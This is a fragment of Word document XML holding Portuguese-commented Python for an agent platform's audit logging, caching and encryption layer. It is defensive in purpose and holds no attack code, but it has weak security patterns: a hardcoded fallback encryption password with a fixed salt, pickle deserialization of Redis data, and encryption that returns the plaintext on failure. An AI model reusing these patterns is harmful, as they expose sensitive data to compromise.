      </w:r>
    </w:p>
    <w:p w14:paraId="5F7124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127F98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get_security_events(self, hours: int = 24, severity: str = None) -&gt; List[Dict[str, Any]]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410FB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"""Recupera eventos de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D1C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conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585727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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22841D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16DEB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since = datetime.now() - timedelta(hours=hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F952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7DB21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severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA963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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69623A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SELECT * FROM security_events </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EA3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WHERE timestamp &gt;= ? AND severity = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4770F3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ORDER BY timestamp DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345B2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LIMIT 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC67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""", (since, severity))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB7D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250CCF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cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779113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SELECT * FROM security_events </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABF1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WHERE timestamp &gt;= ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CF0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ORDER BY timestamp DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA7D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LIMIT 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A65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""", (since,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136308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937DC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columns = [desc[0] for desc in cursor.description]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F063F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results = [dict(zip(columns, row)) for row in cursor.fetchall()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE0D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F2078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conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC806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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B21485" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C9EC3D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A78A3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PerformanceOptimizer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D6A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"""Sistema de otimização de performance"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209959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5F868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15CC3C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self.cache_layers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573324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"memory": {},  # Cache em memória</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601009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"compressed": {},  # Cache comprimido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251FF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"persistent": None  # Redis se disponível</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED631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A2682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self.cache_stats = defaultdict(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256D0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self.connection_pools = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778AB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self.performance_metrics = defaultdict(list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AC8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AA9FE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setup_redis_cache(self, redis_client):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683A1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"""Configura cache Redis"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D473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self.cache_layers["persistent"] = redis_client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56D9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Cache Redis configurado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD106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6E90F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@lru_cache(maxsize=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F43F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get_cached_data(self, key: str, cache_type: str = "memory") -&gt; Any:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B4E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"""Recupera dados do cache com LRU"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5093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cache_type == "memory":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CCE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self.cache_layers["memory"].get(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC86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elif cache_type == "compressed":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB45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compressed_data = self.cache_layers["compressed"].get(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30631D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compressed_data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D76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pickle.loads(gzip.decompress(compressed_data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371A9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elif cache_type == "persistent" and self.cache_layers["persistent"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8EAF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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE018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data = self.cache_layers["persistent"].get(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3624CF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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34CB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return pickle.loads(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E93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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D97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ao recuperar do Redis: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB149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B57AA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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D445C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2989D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set_cached_data(self, key: str, data: Any, ttl: int = 3600, cache_type: str = "memory"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB39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"""Armazena dados no cache"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40AA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47C930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cache_type == "memory":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58A4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self.cache_layers["memory"][key] = data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA713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# Limitar tamanho do cache em memória</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5DA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len(self.cache_layers["memory"]) &gt; 10000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C77E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# Remover 10% dos itens mais antigos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003ABC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items_to_remove = list(self.cache_layers["memory"].keys())[:1000]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CC2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for item_key in items_to_remove:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4BE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del self.cache_layers["memory"][item_key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBCB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E5AFD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elif cache_type == "compressed":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C62A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compressed_data = gzip.compress(pickle.dumps(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F62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self.cache_layers["compressed"][key] = compressed_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5DF7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1FD85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elif cache_type == "persistent" and self.cache_layers["persistent"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E946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serialized_data = pickle.dumps(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31339B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self.cache_layers["persistent"].setex(key, ttl, serialized_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE9D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E3D0B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self.cache_stats[f"{cache_type}_writes"] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EDB0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78956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0AD0AE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ao armazenar no cache {cache_type}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B507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5E5CA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cache_decorator(self, ttl: int = 3600, cache_type: str = "memory"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8CB2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"""Decorator para cache automático"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA2DA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def decorator(func):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9DA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@wraps(func)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303ED0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def wrapper(*args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBBF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# Criar chave única baseada na função e argumentos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D552C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key_data = f"{func.__name__}:{str(args)}:{str(sorted(kwargs.items()))}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A5D1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cache_key = hashlib.md5(key_data.encode()).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5977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56441E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# Tentar recuperar do cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50CD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cached_result = self.get_cached_data(cache_key, cache_type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB7E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cached_result is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B874D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self.cache_stats[f"{cache_type}_hits"] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD57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return cached_result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE4B3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62D6E4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# Executar função e cachear resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69009B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result = func(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574986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self.set_cached_data(cache_key, result, ttl, cache_type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC49B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self.cache_stats[f"{cache_type}_misses"] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E6A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F6797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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EA0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wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC838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decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29D6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F107D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optimize_database_query(self, query: str, params: tuple = None) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F22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"""Otimiza queries de banco de dados"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120246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Adicionar LIMIT se não existir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5590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"SELECT" in query.upper() and "LIMIT" not in query.upper():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79929F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query += " LIMIT 1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F45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9E2B0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Adicionar índices sugeridos (seria implementado com análise real)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78927A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optimization_hints = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267441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4FCC4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"WHERE timestamp" in query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001437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optimization_hints.append("Consider adding index on timestamp")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CC7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391BB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"WHERE agent_id" in query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF2C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optimization_hints.append("Consider adding index on agent_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE7E2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0DBF7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optimization_hints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFCE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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Otimizações sugeridas: {', '.join(optimization_hints)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B2E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8E30E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query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A6D1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FB42F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compress_response(self, data: Any) -&gt; bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80AE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"""Comprime resposta para reduzir bandwidth"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BEAF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isinstance(data, dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362E1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json_data = json.dumps(data, separators=(',', ':'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E63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1CF642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json_data = str(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5868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0A3E7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gzip.compress(json_data.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05E5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2C3263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get_performance_metrics(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A05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métricas de performance"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555CE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Métricas do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E37B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cpu_percent = psutil.cpu_percent(interval=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0204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memory = psutil.virtual_memory()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217818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disk = psutil.disk_usage('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174972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7C056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Métricas de cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD5A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total_hits = sum(self.cache_stats[key] for key in self.cache_stats if 'hits' in key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034461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total_misses = sum(self.cache_stats[key] for key in self.cache_stats if 'misses' in key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163C0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hit_rate = total_hits / (total_hits + total_misses) if (total_hits + total_misses) &gt; 0 else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD05D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691C9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61EEFF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"system": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D21E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"cpu_percent": cpu_percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE352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"memory_percent": memory.percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE05F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"memory_available_gb": memory.available / (1024**3),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE6B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"disk_percent": disk.percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B3D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"disk_free_gb": disk.free / (1024**3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F018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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE503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"cache": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8CF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"hit_rate": hit_rate,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F504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"total_hits": total_hits,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7F7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"total_misses": total_misses,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64A3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"memory_cache_size": len(self.cache_layers["memory"]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFCC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"compressed_cache_size": len(self.cache_layers["compressed"]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE79B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"stats": dict(self.cache_stats)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23550D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0E7D8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96F864A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367F95E2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A5C0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SecurityEnhancementSystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8F2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"""Sistema principal de melhorias de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F9E5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4DE0D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05ACEB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self.rate_limiter = RateLimiter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC46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self.input_validator = InputValidator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A994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self.audit_logger = AuditLogger()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB8C2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self.performance_optimizer = PerformanceOptimizer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F6C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self.encryption_key = self._generate_encryption_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1F8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self.cipher_suite = Fernet(self.encryption_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349F3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7151D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Iniciar processamento de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CC9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self.audit_logger.start_processing()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A477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17755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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema de segurança e otimização inicializado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AC5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2A36AF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_generate_encryption_key(self) -&gt; bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4C2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"""Gera chave de criptografia"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902F2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password = os.getenv("SUNA_ENCRYPTION_PASSWORD", "suna-alsham-default-key").encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010E1B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salt = b'suna_alsham_salt_2025'  # Em produção, usar salt aleatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E1B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kdf = PBKDF2HMAC(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707F4A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algorithm=hashes.SHA256(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5988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length=32,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA16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salt=salt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E7F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iterations=100000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2B5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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BEA4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base64.urlsafe_b64encode(kdf.derive(password))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD1F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190D5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encrypt_sensitive_data(self, data: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6295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"""Criptografa dados sensíveis"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C7F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03769F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encrypted_data = self.cipher_suite.encrypt(data.encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E35A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base64.urlsafe_b64encode(encrypted_data).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45256A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478125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na criptografia: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B41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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DFF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F7258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decrypt_sensitive_data(self, encrypted_data: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B1DE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"""Descriptografa dados sensíveis"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD24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1769A6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decoded_data = base64.urlsafe_b64decode(encrypted_data.encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B157D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decrypted_data = self.cipher_suite.decrypt(decoded_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DF4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decrypted_data.decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F370A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1D9CBF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na descriptografia: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217AE4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encrypted_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029705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6BE7B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validate_request(self, request_data: Dict[str, Any], source_ip: str, user_agent: str, endpoint: str) -&gt; tuple[bool, str]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04892B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"""Valida requisição completa"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50BB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Rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31BE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allowed, rate_info = self.rate_limiter.is_allowed(source_ip, "api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38717F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not allowed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CF1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self._log_security_event(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A0C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"rate_limit_exceeded",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC311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"medium",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7583BA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source_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599BD6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user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7584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endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197276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request_data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747EB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blocked=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D117D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230117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False, "Rate limit exceeded"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE57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77842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Validação de entrada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C10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field, value in request_data.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A7C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field in ["agent_id", "message", "email", "name"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C509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valid, error_msg = self.input_validator.validate_input(value, field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE66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not valid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A79F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self._log_security_event(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C9B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"input_validation_failed",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0560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"high",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AA0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source_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B9AB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user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC4C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endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40EE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{"field": field, "error": error_msg},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914F4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blocked=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405F2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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432207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return False, f"Validation error: {error_msg}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B868C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3B58E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Log de requisição válida</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739ED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self._log_security_event(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746860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"valid_request",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634827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"low",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222A3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source_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F26C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user_agent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203853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endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA2E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{"fields_validated": len(request_data)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C97E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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48177E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86942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True, "Valid request"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BB1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21C75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_log_security_event(self, event_type: str, severity: str, source_ip: str, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAB0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user_agent: str, endpoint: str, details: Dict[str, Any], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D77F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blocked: bool = False):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B06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"""Registra evento de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79338B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event = SecurityEvent(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987CE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event_id=secrets.token_hex(16),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBB5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event_type=event_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E71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severity=severity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2FB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source_ip=source_ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142ABA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user_agent=user_agent or "unknown",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E03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endpoint=endpoint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E721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payload_hash=hashlib.sha256(json.dumps(details, sort_keys=True).encode()).hexdigest(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300EE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timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA6D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details=details,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF47D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blocked=blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D62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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785CB3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76B0D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self.audit_logger.log_security_event(event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ECFB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1E75B5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get_security_dashboard_data(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA04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dados para dashboard de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41DB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Eventos recentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EB6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recent_events = self.audit_logger.get_security_events(24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54242E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B19DA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Estatísticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDB7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total_events = len(recent_events)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B40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blocked_events = len([e for e in recent_events if e['blocked']])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC0B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critical_events = len([e for e in recent_events if e['severity'] == 'critical'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4930AF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BCDF5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Top IPs suspeitos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574567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ip_counts = defaultdict(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8D9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event in recent_events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7A2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event['blocked']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E6AD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ip_counts[event['source_ip']] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238FEF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3EB5B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top_suspicious_ips = sorted(ip_counts.items(), key=lambda x: x[1], reverse=True)[:10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573177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FBE4C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Métricas de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628FC9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performance_metrics = self.performance_optimizer.get_performance_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413633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76EEA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55249A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"security_summary": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852F1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"total_events_24h": total_events,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108A0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"blocked_events_24h": blocked_events,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F22F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"critical_events_24h": critical_events,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002673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"blocked_ips_count": len(self.rate_limiter.blocked_ips),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35DA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"suspicious_ips_count": len(self.rate_limiter.suspicious_ips)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA85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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE26B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"top_suspicious_ips": top_suspicious_ips,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C389D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"recent_events": recent_events[:50],  # Últimos 50 eventos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030628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"performance_metrics": performance_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D4C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"rate_limiting": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099A5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"rules": self.rate_limiter.rules,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D90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"blocked_ips": list(self.rate_limiter.blocked_ips),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75DD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"suspicious_ips": dict(self.rate_limiter.suspicious_ips)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAFDC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EBD34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BA4DE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EF457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cleanup_old_data(self, days: int = 30):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA2E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"""Limpa dados antigos para otimização"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73242C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cutoff_date = datetime.now() - timedelta(days=days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD24E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80AF4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Limpar eventos de segurança antigos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77629B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conn = sqlite3.connect(self.audit_logger.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE377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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6956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D287E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cursor.execute("DELETE FROM security_events WHERE timestamp &lt; ?", (cutoff_date,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593C7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deleted_count = cursor.rowcount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116879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0177B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conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFC39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conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39C4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524CB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logger.info(f"</w:t>
